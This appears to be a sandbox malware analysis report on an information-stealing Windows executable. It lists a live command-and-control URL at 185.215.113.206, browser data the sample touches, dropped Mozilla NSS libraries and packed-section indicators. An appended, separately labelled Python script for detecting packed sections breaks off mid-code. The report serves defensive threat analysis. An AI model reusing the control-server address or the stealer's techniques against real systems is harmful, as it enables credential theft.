Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.0000000000774000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.0000000000857000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpfox
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phph
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpr
Source: h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php~
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/tem
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206D
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.0000000000857000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206c4becf79229cb002.php243a7dd15c52de126103ecf52f0e-release
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_112.4.dr String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: h4ZgewNxoj.exe, h4ZgewNxoj.exe, 00000000.00000002.2473897170.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473770665.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, EBAAAFBG.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_115.4.dr String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_115.4.dr String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_115.4.dr, chromecache_112.4.dr String found in binary or memory: https://apis.google.com
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp, BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp, BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: EBAAAFBG.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, EBAAAFBG.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, EBAAAFBG.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_115.4.dr String found in binary or memory: https://clients6.google.com
Source: chromecache_115.4.dr String found in binary or memory: https://content.googleapis.com
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp, BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp, BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: chromecache_115.4.dr String found in binary or memory: https://domains.google.com/suggest/flow
Source: EBAAAFBG.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: EBAAAFBG.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: EBAAAFBG.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_112.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_112.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_112.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_112.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: chromecache_112.4.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_115.4.dr String found in binary or memory: https://plus.google.com
Source: chromecache_115.4.dr String found in binary or memory: https://plus.googleapis.com
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://support.mozilla.org
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: chromecache_115.4.dr String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp, BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp, BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, EBAAAFBG.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: EBAAAFBG.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_115.4.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_115.4.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_112.4.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_112.4.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_112.4.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007C4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007C4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007C4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: h4ZgewNxoj.exe, 00000000.00000003.2442399066.000000000BADD000.00000004.00000020.00020000.00000000.sdmp, FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: h4ZgewNxoj.exe, 00000000.00000003.2442399066.000000000BADD000.00000004.00000020.00020000.00000000.sdmp, FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007C4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: h4ZgewNxoj.exe, 00000000.00000003.2442399066.000000000BADD000.00000004.00000020.00020000.00000000.sdmp, FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.00000000007A5000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49932

System Summary

Source: h4ZgewNxoj.exe Static PE information: section name:
Source: h4ZgewNxoj.exe Static PE information: section name: .idata
Source: h4ZgewNxoj.exe Static PE information: section name:
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C53B700
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C53B8C0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C53B910
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C4DF280
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4D35A0 0_2_6C4D35A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C54545C 0_2_6C54545C
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4E5440 0_2_6C4E5440
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C515C10 0_2_6C515C10
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C522C10 0_2_6C522C10
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C54AC00 0_2_6C54AC00
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C54542B 0_2_6C54542B
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4E64C0 0_2_6C4E64C0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4FD4D0 0_2_6C4FD4D0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C516CF0 0_2_6C516CF0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DD4E0 0_2_6C4DD4E0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4E6C80 0_2_6C4E6C80
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5334A0 0_2_6C5334A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53C4A0 0_2_6C53C4A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C500512 0_2_6C500512
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4EFD00 0_2_6C4EFD00
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4FED10 0_2_6C4FED10
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C510DD0 0_2_6C510DD0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5385F0 0_2_6C5385F0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C513E50 0_2_6C513E50
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4F4640 0_2_6C4F4640
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C522E4E 0_2_6C522E4E
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4F9E50 0_2_6C4F9E50
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C546E63 0_2_6C546E63
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DC670 0_2_6C4DC670
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C517E10 0_2_6C517E10
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C525600 0_2_6C525600
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C539E30 0_2_6C539E30
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5476E3 0_2_6C5476E3
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DBEF0 0_2_6C4DBEF0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4EFEF0 0_2_6C4EFEF0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53E680 0_2_6C53E680
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4F5E90 0_2_6C4F5E90
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C534EA0 0_2_6C534EA0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C517710 0_2_6C517710
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4E9F00 0_2_6C4E9F00
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C506FF0 0_2_6C506FF0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DDFE0 0_2_6C4DDFE0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5277A0 0_2_6C5277A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4F8850 0_2_6C4F8850
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4FD850 0_2_6C4FD850
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C51F070 0_2_6C51F070
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4E7810 0_2_6C4E7810
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C51B820 0_2_6C51B820
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C524820 0_2_6C524820
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5450C7 0_2_6C5450C7
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4FC0E0 0_2_6C4FC0E0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5158E0 0_2_6C5158E0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5060A0 0_2_6C5060A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4FA940 0_2_6C4FA940
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C52B970 0_2_6C52B970
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C54B170 0_2_6C54B170
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4ED960 0_2_6C4ED960
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C515190 0_2_6C515190
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C532990 0_2_6C532990
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C50D9B0 0_2_6C50D9B0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DC9A0 0_2_6C4DC9A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C519A60 0_2_6C519A60
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C518AC0 0_2_6C518AC0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C51E2F0 0_2_6C51E2F0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4F1AF0 0_2_6C4F1AF0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C54BA90 0_2_6C54BA90
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C542AB0 0_2_6C542AB0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4D22A0 0_2_6C4D22A0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C504AA0 0_2_6C504AA0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4ECAB0 0_2_6C4ECAB0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4D5340 0_2_6C4D5340
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4EC370 0_2_6C4EC370
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C51D320 0_2_6C51D320
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C5453C8 0_2_6C5453C8
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4DF380 0_2_6C4DF380
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: String function: 6C5194D0 appears 90 times
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: String function: 6C50CBE8 appears 134 times
Source: h4ZgewNxoj.exe, 00000000.00000002.2473934670.000000006C562000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs h4ZgewNxoj.exe
Source: h4ZgewNxoj.exe, 00000000.00000002.2474156729.000000006C755000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs h4ZgewNxoj.exe
Source: h4ZgewNxoj.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: h4ZgewNxoj.exe Static PE information: Section: cndowtni ZLIB complexity 0.9947586949432167
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@30/57@6/6
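The three static indicators above (a section whose name is unprintable, a section named cndowtni whose ZLIB complexity is 0.9948, and the "changes PE section rights" unpacking signature) are what a packed stealer looks like before it runs. The script below is an added example, not part of this report or of Joe Sandbox; it reproduces the checks with the standard library only, on a constructed PE32 image whose layout (section names, data, characteristics, the 0.90 packed threshold and the 1 KiB minimum size) is assumed for the demonstration and is not the analysed sample.

```python
import hashlib
import struct
import zlib
from dataclasses import dataclass
from typing import List, Tuple

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
PACKED_THRESHOLD = 0.90         # assumed: compressed/raw ratio above this looks packed or encrypted


@dataclass
class SectionInfo:
    name: str
    raw_size: int
    zlib_complexity: float
    special_name: bool
    writable_executable: bool

    @property
    def packed_like(self) -> bool:
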